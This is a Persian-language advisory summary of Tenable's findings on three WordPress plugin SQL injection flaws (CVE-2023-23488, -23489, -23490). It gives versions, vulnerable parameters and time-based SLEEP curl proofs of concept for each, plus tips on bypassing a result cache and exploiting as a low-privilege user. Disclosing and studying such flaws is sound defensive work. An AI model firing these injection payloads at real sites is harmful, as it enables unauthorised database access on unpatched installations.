محققای tenable در پلاگین های وردپرسی ، Paid Memberships Pro و Easy Digital Downloads و Survey Maker ، آسیب پذیری SQLi کشف کردن.
آسیب پذیری ها در 19 دسامبر ، 28 آذر ، گزارش شدن. روز بعدش وردپرس ، آسیب پذیری ها رو تایید کرده.
پلاگین Survey Maker نسخه اصلاح شده رو در 21 دسامبر ، 30 آذر ،منتشر کرده. پلاگین Paid Memberships Pro نسخه اصلاح شده رو در 27 دسامبر ، 6 دی، منتشر کرده و در نهایت پلاگین Easy Digital Downloads در 5 ژانویه 2023 ، 15 دی ، نسخه اصلاحیه رو منتشر کرده.
آسیب پذیری CVE-2023-23488 :
آسیب پذیری از نوع Unauthenticated SQL Injection هستش و در پلاگین Paid Memberships Pro رخ میده. دارای امتیاز 9.8 هستش. این پلاگین بیش از 100 هزار نصب فعال داره.
نسخه های تحت تاثیر :
Paid Memberships Pro < 2.9.8
نسخه اصلاح شده :
Paid Memberships Pro: 2.9.8
آسیب پذیری در پارامتر code در مسیر /pmpro/v1/order رخ میده. نمونه PoC برای این آسیب پذیری : (اجرای Sleep )
time curl “http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(1)))a)–%20-”
{}
real 0m3.068s
user 0m0.006s
sys 0m0.009stime curl “http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)–%20-”
{}
real 0m6.095s
user 0m0.006s
sys 0m0.009s
آسیب پذیری CVE-2023-23489 :
آسیب پذیری از نوع Unauthenticated SQL Injection و در پلاگین Easy Digital Downloads هستش. دارای امتیاز 9.8 هستش. این افزونه بیش از 50هزار نصب فعال داره.
نسخه تحت تاثیر :
Easy Digital Downloads < 3.1.0.4
نسخه اصلاح شده :
Easy Digital Downloads 3.1.0.4
آسیب پذیری در پارامتر s در اکشن edd_download_search رخ میده. محل آسیب پذیری در تابع edd_ajax_download_search و در مسیر زیر قرار داره.
./includes/ajax-functions.php
PoC برای این آسیب پذیری : (اجرای SLEEP)
curl “http://TARGET_HOST/wp-admin/admin-ajax.php?action=edd_download_search&s=1’+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)–+-“
یه نکته ای که در خصوص این PoC هستش اینکه اگه اونو دوبار پشت سر هم اجرا کنید ، اجرا نمیشه. دلیلشم اینه که تابع edd_ajax_download_search جستجوها رو به مدت 30 ثانیه ذخیره میکنه.
بنابراین برای دور زدن اون یا باید 30 ثانیه منتظر بشید و بعدش پیلود رو دوباره اجرا کنید یا هم اینکه هر سری تغییراتی رو در پیلود بدید که یکسان نباشه.
آسیب پذیری CVE-2023-23490 :
این آسیب پذیری از نوع Authenticated SQL Injection و در پلاگین Survey Maker هستش.دارای امتیاز 8.8 هستش. این پلاگین بیش از 3000 نصب فعال داره.
نسخه های تحت تاثیر :
Survey Maker < 3.1.2
نسخه های اصلاح شده:
Survey Maker 3.1.2
آسیب پذیری در پارامتر surveys_ids در اکشن ays_surveys_export_json هستش. البته برای اکسپلویت نیاز به احراز هویت هستش. ولی نیاز به کاربر با امتیاز بالا نداره و میشه با کاربر subscriber هم اکسپلویت کرد.
curl “http://$TARGET_HOST/wp-admin/admin-ajax.php” –header “$WP_COOKIE” –data “action=ays_surveys_export_json&surveys_ids[0]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(3)))a)–+-“
نکته : با توجه به اینکه برای اکسپلویت نیاز به احرازهویت هست باید یه کوکی در $WP_COOKIE ست بشه.